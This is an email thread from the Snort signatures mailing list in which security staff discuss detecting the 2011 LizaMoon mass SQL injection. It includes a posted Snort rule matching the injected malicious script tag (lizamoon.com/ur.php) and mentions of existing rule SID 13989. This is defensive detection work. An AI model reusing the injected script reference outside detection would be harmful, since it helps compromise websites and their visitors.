As it turns out, SID 13989 will detect the injection attack.<div><br></div><div>Our honeypots had noticed some interesting data around that rule, and around the same time we noticed this posting:</div><div><br></div><div><a href="http://stackoverflow.com/questions/3788080/attack-on-asp-site-that-uses-a-sql-server-database">http://stackoverflow.com/questions/3788080/attack-on-asp-site-that-uses-a-sql-server-database</a></div>
<div><br></div><div><a href="http://stackoverflow.com/questions/3788080/attack-on-asp-site-that-uses-a-sql-server-database"></a>It's pretty clear that the query shown on that page is what's being used to spread this. Additionally, Jason, props to you for recognizing that a rule should skip the domain, since a link off of the above page shows live attacks have used distinct domains; the rule you've posted above will work in the wild. </div>
<div><br></div><div>For what it's worth, SID 13989 is disabled by default, since it was considered somewhat experimental when it was written. Since it did a pretty good job of detecting ASPRox, and now this Lizamoon thing, we may consider putting it into some policies for people - though I'd be curious to get feedback from the list on that.<br>
<div><br><div class="gmail_quote">On Thu, Mar 31, 2011 at 6:26 PM, Joel Esler <span dir="ltr"><<a href="mailto:jesler@...435...">jesler@...3451...5...</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex;">
<div>
            <div><span>Might be interesting either way.  To see if one of your users was browsing to a compromised site, but also interesting to see an outbound one ($HOME_NET $HTTP_PORTS -> $EXTERNAL_NET any) to see if one of your sites was compromised.</span></div>
<div><span><br></span></div><div><span><br>
                </span>
                <span><br>-- <br><font color="#888888">Joel Esler<br><div><a href="http://blog.snort.org" target="_blank">http://blog.snort.org</a> | <a href="http://vrt-blog.snort.org" target="_blank">http://vrt-blog.snort.org</a></div>
<div>Twitter: <a href="http://twitter.com/snort" target="_blank">http://twitter.com/snort</a></div><br></font></span><div><div></div><div class="h5">
                
                
                <p style="color:#a0a0a0">On Thursday, March 31, 2011 at 6:17 PM, Alex Kirk wrote:</p>
                <blockquote type="cite" style="border-left-style:solid;border-width:1px;margin-left:0px;padding-left:10px">
                    <span><div><div>Detecting compromised pages should be trivial:<div><br></div><div>alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"SPECIFIC-THREATS <a href="http://lizamoon.com" target="_blank">lizamoon.com</a> SQL injection compromised page"; flow:established,to_client; content:"script src=http|3A 2F 2F|<a href="http://lizamoon.com" target="_blank">lizamoon.com</a>|2F|ur.php"; nocase; classtype:trojan-activity;)</div>

<div><br></div><div>We can toss that into an upcoming SEU, given its growing prevalence.<br><br><div>On Thu, Mar 31, 2011 at 6:08 PM, Jason Haar <span dir="ltr"><<a href="mailto:Jason.Haar@...651..." target="_blank">Jason.Haar@...651...</a>></span> wrote:<br>
<blockquote type="cite"><div>Hi there<br>
<br>
As you are all no doubt aware, the "lizamoon" SQL injection attack has<br>
already hacked over 380,000 urls. Does anyone know if snort picks it via<br>
one of it's existing rules, and if not, has anyone written one?<br>
<br>
Thanks<br>
<br>
<a href="http://community.websense.com/blogs/securitylabs/archive/2011/03/29/lizamoon-mass-injection-28000-urls-including-itunes.aspx" target="_blank">http://community.websense.com/blogs/securitylabs/archive/2011/03/29/lizamoon-mass-injection-28000-urls-including-itunes.aspx</a><br>


<br>
--<br>
Cheers<br>
<br>
Jason Haar<br>
Information Security Manager, Trimble Navigation Ltd.<br>
Phone: +64 3 9635 377 Fax: +64 3 9635 417<br>
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1<br>
<br>
<br>
------------------------------------------------------------------------------<br>
Create and publish websites with WebMatrix<br>
Use the most popular FREE web apps or write code yourself;<br>
WebMatrix provides all the features you need to develop and<br>
publish your website. <a href="http://p.sf.net/sfu/ms-webmatrix-sf" target="_blank">http://p.sf.net/sfu/ms-webmatrix-sf</a><br>
_______________________________________________<br>
Snort-sigs mailing list<br>
<a href="mailto:Snort-sigs@lists.sourceforge.net" target="_blank">Snort-sigs@lists.sourceforge.net</a><br>
<a href="https://lists.sourceforge.net/lists/listinfo/snort-sigs" target="_blank">https://lists.sourceforge.net/lists/listinfo/snort-sigs</a><br>
<a href="http://www.snort.org" target="_blank">http://www.snort.org</a><br>
</div></blockquote></div><br><br clear="all"><br>-- <br>Alex Kirk<br>AEGIS Program Lead<br>Sourcefire Vulnerability Research Team<br>+1-410-423-1937<br><a href="mailto:alex.kirk@...435..." target="_blank">alex.kirk@...3395...35...</a><br>


</div>
</div><div>------------------------------------------------------------------------------<br>Create and publish websites with WebMatrix<br>Use the most popular FREE web apps or write code yourself; <br>WebMatrix provides all the features you need to develop and <br>
publish your website. <a href="http://p.sf.net/sfu/ms-webmatrix-sf" target="_blank">http://p.sf.net/sfu/ms-webmatrix-sf</a><br></div><div>_______________________________________________<br>Snort-sigs mailing list<br><a href="mailto:Snort-sigs@lists.sourceforge.net" target="_blank">Snort-sigs@lists.sourceforge.net</a><br>
<a href="https://lists.sourceforge.net/lists/listinfo/snort-sigs" target="_blank">https://lists.sourceforge.net/lists/listinfo/snort-sigs</a><br><a href="http://www.snort.org" target="_blank">http://www.snort.org</a><br></div>
</div></span>
                
                
                
                
                </blockquote>
                
                <div>
                    <br>
                </div>
            </div></div></div>
        </div></blockquote></div><br><br clear="all"><br>-- <br>Alex Kirk<br>AEGIS Program Lead<br>Sourcefire Vulnerability Research Team<br>+1-410-423-1937<br><a href="mailto:alex.kirk@...435...">alex.kirk@...435...</a><br>

</div></div>